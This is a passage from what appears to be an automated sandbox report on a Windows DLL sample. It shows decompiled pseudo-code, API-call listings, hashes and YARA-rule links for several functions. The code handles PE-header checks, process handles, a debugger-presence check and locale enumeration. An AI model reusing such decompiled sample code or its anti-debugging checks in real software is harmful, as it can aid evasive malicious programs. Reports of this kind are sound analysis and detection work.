													__eflags = _t86;
													 *0x6e2d41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e2d4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e2d41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e2d4240 = 1;
							__eflags =  *0x6e2d4240;
							if( *0x6e2d4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e2d4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e2d4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e2d41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                          0x6e2d23df
                                                                                                                          0x6e2d23e2
                                                                                                                          0x6e2d23e8
                                                                                                                          0x6e2d2406
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2406
                                                                                                                          0x6e2d23f0
                                                                                                                          0x6e2d23f9
                                                                                                                          0x6e2d23ff
                                                                                                                          0x6e2d240e
                                                                                                                          0x6e2d2411
                                                                                                                          0x6e2d2414
                                                                                                                          0x6e2d241e
                                                                                                                          0x6e2d241e
                                                                                                                          0x6e2d2420
                                                                                                                          0x6e2d2423
                                                                                                                          0x6e2d2425
                                                                                                                          0x6e2d2425
                                                                                                                          0x6e2d2427
                                                                                                                          0x6e2d242a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d242c
                                                                                                                          0x6e2d242e
                                                                                                                          0x6e2d2494
                                                                                                                          0x6e2d2494
                                                                                                                          0x6e2d25f2
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25f2
                                                                                                                          0x6e2d2430
                                                                                                                          0x6e2d2430
                                                                                                                          0x6e2d2434
                                                                                                                          0x6e2d2436
                                                                                                                          0x6e2d2436
                                                                                                                          0x6e2d2436
                                                                                                                          0x6e2d2436
                                                                                                                          0x6e2d2439
                                                                                                                          0x6e2d243a
                                                                                                                          0x6e2d243d
                                                                                                                          0x6e2d243d
                                                                                                                          0x6e2d2441
                                                                                                                          0x6e2d2445
                                                                                                                          0x6e2d2453
                                                                                                                          0x6e2d2453
                                                                                                                          0x6e2d245b
                                                                                                                          0x6e2d2461
                                                                                                                          0x6e2d2463
                                                                                                                          0x6e2d2465
                                                                                                                          0x6e2d2475
                                                                                                                          0x6e2d2482
                                                                                                                          0x6e2d2486
                                                                                                                          0x6e2d248b
                                                                                                                          0x6e2d248d
                                                                                                                          0x6e2d250b
                                                                                                                          0x6e2d250b
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d250d
                                                                                                                          0x6e2d250f
                                                                                                                          0x6e2d25f0
                                                                                                                          0x6e2d25f0
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2515
                                                                                                                          0x6e2d2515
                                                                                                                          0x6e2d251c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2522
                                                                                                                          0x6e2d2526
                                                                                                                          0x6e2d2582
                                                                                                                          0x6e2d2584
                                                                                                                          0x6e2d258c
                                                                                                                          0x6e2d258e
                                                                                                                          0x6e2d2590
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2592
                                                                                                                          0x6e2d2598
                                                                                                                          0x6e2d259a
                                                                                                                          0x6e2d259c
                                                                                                                          0x6e2d25b1
                                                                                                                          0x6e2d25b1
                                                                                                                          0x6e2d25b3
                                                                                                                          0x6e2d25e2
                                                                                                                          0x6e2d25e9
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25e9
                                                                                                                          0x6e2d25b7
                                                                                                                          0x6e2d25b8
                                                                                                                          0x6e2d25ba
                                                                                                                          0x6e2d25bc
                                                                                                                          0x6e2d25bc
                                                                                                                          0x6e2d25be
                                                                                                                          0x6e2d25c0
                                                                                                                          0x6e2d25c2
                                                                                                                          0x6e2d25d6
                                                                                                                          0x6e2d25d6
                                                                                                                          0x6e2d25d9
                                                                                                                          0x6e2d25db
                                                                                                                          0x6e2d25db
                                                                                                                          0x6e2d25dc
                                                                                                                          0x6e2d25dc
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25cd
                                                                                                                          0x6e2d25ce
                                                                                                                          0x6e2d25d0
                                                                                                                          0x6e2d25d2
                                                                                                                          0x6e2d25d2
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c2
                                                                                                                          0x6e2d259e
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d25a7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25a9
                                                                                                                          0x6e2d25aa
                                                                                                                          0x6e2d25ad
                                                                                                                          0x6e2d25af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25af
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d2528
                                                                                                                          0x6e2d252b
                                                                                                                          0x6e2d2530
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2539
                                                                                                                          0x6e2d253b
                                                                                                                          0x6e2d2541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2547
                                                                                                                          0x6e2d254d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2553
                                                                                                                          0x6e2d2555
                                                                                                                          0x6e2d255e
                                                                                                                          0x6e2d2562
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2568
                                                                                                                          0x6e2d256b
                                                                                                                          0x6e2d256d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2574
                                                                                                                          0x6e2d2576
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2578
                                                                                                                          0x6e2d257c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d257c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d246e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2470
                                                                                                                          0x6e2d2471
                                                                                                                          0x6e2d2473
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2473
                                                                                                                          0x6e2d249b
                                                                                                                          0x6e2d249d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24ad
                                                                                                                          0x6e2d24af
                                                                                                                          0x6e2d24b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24b7
                                                                                                                          0x6e2d24be
                                                                                                                          0x6e2d24ea
                                                                                                                          0x6e2d24ea
                                                                                                                          0x6e2d24ec
                                                                                                                          0x6e2d24ee
                                                                                                                          0x6e2d2502
                                                                                                                          0x6e2d2504
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f9
                                                                                                                          0x6e2d24fa
                                                                                                                          0x6e2d24fc
                                                                                                                          0x6e2d24fe
                                                                                                                          0x6e2d24fe
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24c0
                                                                                                                          0x6e2d24c3
                                                                                                                          0x6e2d24c5
                                                                                                                          0x6e2d24d7
                                                                                                                          0x6e2d24d7
                                                                                                                          0x6e2d24da
                                                                                                                          0x6e2d24dc
                                                                                                                          0x6e2d24dc
                                                                                                                          0x6e2d24dd
                                                                                                                          0x6e2d24dd
                                                                                                                          0x6e2d24e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d0
                                                                                                                          0x6e2d24d0
                                                                                                                          0x6e2d24d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d1
                                                                                                                          0x6e2d24d3
                                                                                                                          0x6e2d24d5
                                                                                                                          0x6e2d24e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24e8
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d5
                                                                                                                          0x6e2d2447
                                                                                                                          0x6e2d244a
                                                                                                                          0x6e2d244d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d244f
                                                                                                                          0x6e2d2451
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2451
                                                                                                                          0x6e2d2416
                                                                                                                          0x6e2d2418
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E2D2486
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryQueryVirtual
                                                                                                                          • String ID: @B-n$@B-n$@B-n
                                                                                                                          • API String ID: 2850889275-4035706962
                                                                                                                          • Opcode ID: b44b543f892e3580996ce2dcf865b0bc9887ce664597ebc785fe443bd1d85548
                                                                                                                          • Instruction ID: 913d30a06d8468527b622c31be0f9b73c1d822c5ec74537aaab78b725ff75cb5
                                                                                                                          • Opcode Fuzzy Hash: b44b543f892e3580996ce2dcf865b0bc9887ce664597ebc785fe443bd1d85548
                                                                                                                          • Instruction Fuzzy Hash: E16106B3A1450BCFE75ACFA8D8A0B5933A7FB45315B248528DF16C7184FB30D88AC650
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1825, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D1825() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e2d41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e2d41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e2d41ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e2d41a8 = _t5;
						 *0x6e2d41b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e2d41a4 = _t6;
						if(_t6 == 0) {
							 *0x6e2d41a4 =  *0x6e2d41a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                          0x6e2d1826
                                                                                                                          0x6e2d1834
                                                                                                                          0x6e2d183a
                                                                                                                          0x6e2d1841
                                                                                                                          0x6e2d1898
                                                                                                                          0x6e2d1898
                                                                                                                          0x6e2d1843
                                                                                                                          0x6e2d184b
                                                                                                                          0x6e2d1858
                                                                                                                          0x6e2d1858
                                                                                                                          0x6e2d1894
                                                                                                                          0x6e2d1896
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d184d
                                                                                                                          0x6e2d1854
                                                                                                                          0x6e2d185a
                                                                                                                          0x6e2d185a
                                                                                                                          0x6e2d185f
                                                                                                                          0x6e2d186d
                                                                                                                          0x6e2d1872
                                                                                                                          0x6e2d1878
                                                                                                                          0x6e2d187e
                                                                                                                          0x6e2d1885
                                                                                                                          0x6e2d1887
                                                                                                                          0x6e2d1887
                                                                                                                          0x6e2d1891
                                                                                                                          0x6e2d1856
                                                                                                                          0x6e2d1856
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1856
                                                                                                                          0x6e2d1854

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2D15D1), ref: 6E2D1834
                                                                                                                          • GetVersion.KERNEL32 ref: 6E2D1843
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6E2D185F
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2D1878
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 845504543-0
                                                                                                                          • Opcode ID: 25741211f42a666f647ad402bba1a7eaf446d31637e80bba8a050bff23f6429c
                                                                                                                          • Instruction ID: b61bdad750c6111075544976a63a4da69d380fdbd90f7da2efd4e337bbda573b
                                                                                                                          • Opcode Fuzzy Hash: 25741211f42a666f647ad402bba1a7eaf446d31637e80bba8a050bff23f6429c
                                                                                                                          • Instruction Fuzzy Hash: 94F01931E98A6A9BFF509BA8A81E7553BA3B707712F04405AE741D61C4E7B0808ACB74
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E316CB3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6E316DAB
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E316DB5
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E316DC2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: bac6330f8ded5978ad8195bc04860b7019cb512d2de055ae937e6b2218b46067
                                                                                                                          • Instruction ID: b9a03da6f405c6b61be4d0c73a1073a113609264ea0488eb2d4b39e02381d548
                                                                                                                          • Opcode Fuzzy Hash: bac6330f8ded5978ad8195bc04860b7019cb512d2de055ae937e6b2218b46067
                                                                                                                          • Instruction Fuzzy Hash: 0D31C4749112289BCB65DFA8DD887CDBBB8AF08310F6045DAE45CA7290EB749B858F44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32C325, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,6E32C324,?,000000FF,?,?,?,00000004), ref: 6E32C347
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,6E32C324,?,000000FF,?,?,?,00000004), ref: 6E32C34E
                                                                                                                          • ExitProcess.KERNEL32 ref: 6E32C360
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 851c85848187a0246872c969287ada89bb81092dcaaa88d7e8ab7994cac409e8
                                                                                                                          • Instruction ID: 5674a0ac6a0e77fcd20aa7ee484b098644fa9643254334f991c62a25ea725cc2
                                                                                                                          • Opcode Fuzzy Hash: 851c85848187a0246872c969287ada89bb81092dcaaa88d7e8ab7994cac409e8
                                                                                                                          • Instruction Fuzzy Hash: E7E0B671010648EFDF02BFA4C958A8D3B6DFB45395F204824FA859E125DB3AD981CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E31D630, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                          • Instruction ID: eb82ef8d255bc43b964f7be21bc52ed1f310e81c9c86bced6093110f91986b86
                                                                                                                          • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                          • Instruction Fuzzy Hash: 7EF13A71E042199FDF18CFA9C8906DEBBB1EF89315F55826DD819AB344D731AA01CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E333CCE, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E333CC9,?,?,00000008,?,?,6E343264,00000000), ref: 6E333EFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionRaise
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3997070919-0
                                                                                                                          • Opcode ID: d49f39c31f7a42f26993af84cdcf703593cf19993778377f356aaee366a7a3d4
                                                                                                                          • Instruction ID: 47d1ecf50f0620532144e1bb5938dfdf99760f65dcd5ac916de0162c01d32cd7
                                                                                                                          • Opcode Fuzzy Hash: d49f39c31f7a42f26993af84cdcf703593cf19993778377f356aaee366a7a3d4
                                                                                                                          • Instruction Fuzzy Hash: 69B145362206598FD744CF68C49AF947BA0FF45365F65C658E8A9CF2A1C336E982CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E3AD, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E4D3,00000001,00000000,?,-00000050,?,6E33EB01,00000000,?,?,?,00000055,?), ref: 6E33E41F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 2f359b522d33e0b395186cb4ddec1257a12b87613254e22cc3556b21596c84c0
                                                                                                                          • Instruction ID: 7cbaf9fc2f52cef123b19d01ddb9130be700817c684664ab063263233c53b8b8
                                                                                                                          • Opcode Fuzzy Hash: 2f359b522d33e0b395186cb4ddec1257a12b87613254e22cc3556b21596c84c0
                                                                                                                          • Instruction Fuzzy Hash: ED11403B6047059FDB189FB6C4949AAB7A1FF84328B24443DD98647700D371B942C740
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E448, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E726,00000001,00000000,?,-00000050,?,6E33EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E492
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 9265bd3905a340f8883ef142d5f5bb3b531c0576627c0b2344579fc72bc615e0
                                                                                                                          • Instruction ID: 0ec0e9aa7223a3b2e2a2d96b092ada49a1f52b066d907094819bc50a9f87e86e
                                                                                                                          • Opcode Fuzzy Hash: 9265bd3905a340f8883ef142d5f5bb3b531c0576627c0b2344579fc72bc615e0
                                                                                                                          • Instruction Fuzzy Hash: 22F0F6362043545FD7245FFAD885EAABB95EF85378F25882DE9854B640D7B2AC01C710
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E330429, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E31843F: RtlEnterCriticalSection.NTDLL(?), ref: 6E31844E
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33041C,00000001,6E378410,0000000C,6E330CBD,00000000), ref: 6E330461
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1272433827-0
                                                                                                                          • Opcode ID: 455c1af81d71bc35303ce67f8b051f8da3c5bed67a884d50369718437d3ab87e
                                                                                                                          • Instruction ID: a258dea9d2a3856f7e3b4052c6d446fd5c2affea9a8891773ac6f4c7f66784e9
                                                                                                                          • Opcode Fuzzy Hash: 455c1af81d71bc35303ce67f8b051f8da3c5bed67a884d50369718437d3ab87e
                                                                                                                          • Instruction Fuzzy Hash: 88F03776A04614DFDB14EFE8E802BAC77F4EB45329F20856AE4109B290DB758901CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E344, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E29D,00000001,00000000,?,?,6E33EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E37B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 5113a00c007a502286bb5763d62fbd06eb0fcba42c23a79ca8bb49074031446b
                                                                                                                          • Instruction ID: b55a06f0375482be62a57935a9c3b14b4da4321a3c9e7769ddcb46900894e038
                                                                                                                          • Opcode Fuzzy Hash: 5113a00c007a502286bb5763d62fbd06eb0fcba42c23a79ca8bb49074031446b
                                                                                                                          • Instruction Fuzzy Hash: A3F0553A30034597CB04AFB6C848A6ABFA4EFC2325F2A4059EA258B240C6329842C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E330E4C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6E3333BC,?,20001004,00000000,00000002,?,?,6E33271D), ref: 6E330E80
                                                                                                                          Memory Dump Source
